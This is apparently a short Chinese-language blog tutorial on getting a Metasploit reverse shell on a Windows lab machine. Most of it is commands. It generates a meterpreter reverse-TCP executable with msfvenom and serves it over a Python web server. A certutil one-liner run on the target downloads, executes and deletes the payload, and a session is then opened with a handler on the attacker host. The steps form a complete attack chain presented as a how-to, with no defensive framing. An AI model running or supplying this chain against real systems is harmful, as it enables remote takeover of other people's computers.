MSF反弹shell

靶机地址:windows 192.168.1.84

攻击者地址:192.168.20.44 kali

 

在kali当中生成脚本 msfvenom -p windows/meterpreter_reverse_tcp lhost=192.168.20.44 lport=7070 -f exe -o /tmp/win.exe

 MSF反弹shell

 

 

在kali当中,执行 cd /tmp 进入刚刚生成脚本的目录

MSF反弹shell

 

 

执行 python -m SimpleHTTPServer 80

去目标机器,也就是靶机*问 

MSF反弹shell

 

 访问出现这样的,说明访问成功

下一步:开启监听,在kali服务器上输入 msfconsole命令,进入MSF

等模块加载完成,输入:handler -p windows/meterpreter_reverse_tcp -H 192.168.20.44 -P 7070 (如果报错,就手动输入)

输入完成以后,去靶机上打开cmd  执行:cmd.exe /c "certutil.exe -urlcache -split -f http://192.168.20.44/win.exe &win.exe &del win.exe"

 

然后就可以看到成功建立连接了

再次执行sessions  看看会话

这时候就多了一条记录,执行  sessions -i 1  就能打开会话,这个时候就进入了对方系统

上一篇:NC反弹shell的几种方法


下一篇:Kali创建应用快捷方式